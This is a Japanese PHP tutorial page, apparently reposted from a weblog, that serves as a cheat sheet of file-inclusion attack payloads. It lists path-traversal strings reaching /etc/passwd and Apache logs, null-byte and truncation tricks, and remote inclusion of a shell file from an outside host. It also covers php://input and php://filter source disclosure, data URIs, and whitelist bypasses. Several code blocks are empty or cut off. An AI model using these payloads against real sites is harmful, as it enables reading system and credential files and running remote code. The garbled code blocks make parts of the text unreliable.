ホームページ > バックエンド開発 > PHPチュートリアル > 脆弱性解析を含むPHPファイルについて_PHPチュートリアル

脆弱性解析を含むPHPファイルについて_PHPチュートリアル

WBOY
リリース: 2016-07-13 17:10:33
オリジナル
1288 人が閲覧しました

この記事では、php ファイルがインクルードされる場合の inlcude の脆弱性を簡単に分析します。これが皆様のお役に立てば幸いです。

基本的なファイルインクルードの脆弱性:

コードは次のとおりです コードをコピー

) * 同じパスの下にファイルが含まれています:
?file=.htaccess
* パストラバーサル:
?file=../../../../../../../../../var/lib/locate.db
(このファイルは、ファイル システムを検索できるため、非常に興味深いものです)
* 挿入された PHP コードを含むファイル:
?file=../../../../../../../../../var/log/apache/error.log
(他の考えられる Apache ディレクトリはここで、他の方法はここで見つけることができます。考えられるすべてのログファイル、ファイルアップロード、セッションファイルなどについて考えてください。)

制限されているローカル ファイルには以下が含まれます:

コードは次のとおりです コードをコピー
?file=../../../../../../../../../etc/passwd%00
(magic_quotes_gpc=off が必要)
* カラムディレクトリ (Null Byte Injection):
?file=../../../../../../../../../var/www/accounts/%00
(BSD のみ、magic_quotes_gpc=off が必要、詳細はこちら)
*パスの切り捨て:
?file=../../../../../../../../../etc/passwd..........
(詳しくはこちらとこちらをご覧ください)
* ドットの切り捨て:
?file=../../../../../../../../../etc/passwd………………
(Windows のみ、詳細はこちら)

基本的なリモート ファイルには次のものが含まれます:

コードは次のとおりですコードをコピー


*リモートコードを含む:

?file=[http|https|ftp]://websec.wordpress.com/shell.txt

(allow_url_fopen=On およびallow_url_include=On が必要)

* PHP ストリームの使用 php://input:

?file=php://input

(POST パラメーターでペイロードを指定し、urlencoding を確認してください。詳細はこちら、allow_url_include=On が必要です)

* PHP ストリームの使用 php://filter:

?file=php://filter/convert.base64-encode/resource=index.php
(base64 では評価されないため、PHP ソースを読み取ることができます。詳細については、こことここを参照してください)
* データ URI の使用:
?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
(allow_url_include=On が必要)

* クロスサイト スクリプティング攻撃 (XSS を使用):

コードは次のとおりですコードをコピー?file=http://127.0.0.1/path/xss.php?xss=phpcode

制限付きリモートファイルインクルードの脆弱性

(ファイアウォールで保護されている場合、またはホワイトリストに登録されたドメインのみが許可されている場合は意味があります)

コードは次のとおりです コードをコピー
* ?file=http://websec.wordpress.com/shell.txt?
* ?file=http://websec.wordpress.com/shell.txt%23
(allow_url_fopen=On およびallow_url_include=On が必要)

静的リモート ファイル インクルードの脆弱性:

コードは次のとおりですコードをコピー

* Man In The Middle 攻撃(マン・イン・ザ・ミドル)
(確かに面倒ですが、よく忘れられます)

ライナーズのウェブログより。

http://www.bkjia.com/PHPjc/629654.htmlwww.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/629654.html技術記事この記事では、php ファイルがインクルードされる場合の inlcude の脆弱性を簡単に分析します。これが皆様のお役に立てば幸いです。 基本的なファイルインクルードの脆弱性: コードは次のとおりです コードをコピーします ?php include...
ソース:php.cn
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート